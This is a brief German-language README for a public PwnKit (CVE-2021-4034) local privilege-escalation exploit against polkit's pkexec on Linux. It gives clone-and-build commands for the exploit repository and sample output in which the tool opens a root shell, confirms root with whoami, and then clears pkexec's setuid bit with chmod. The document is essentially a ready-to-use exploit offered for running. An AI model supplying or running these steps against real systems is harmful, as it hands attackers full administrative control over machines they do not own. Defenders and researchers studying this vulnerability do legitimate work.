
Lokaler Privilege-Escalation-Exploit für CVE-2021-4034 (PwnKit), der auf pkexec von polkit abzielt und Root-Shell-Zugriff auf verwundbare Linux-Systeme ermöglicht.
$ git clone https://github.com/whokilleddb/CVE-2021-4034
$ cd CVE-2021-4034
$ make
[!] CVE-2021-4034 Exploit By whokilleddb
[!] Initializing Setup
[+] Setup Done :D
[!] Setting Root Privileges
[!] Launching Root Shell
# /bin/whoami
root
# chmod 0755 `which pkexec`
Hinweis: Sie können die Optionen konfigurieren, indem Sie mit include/config.h herumspielen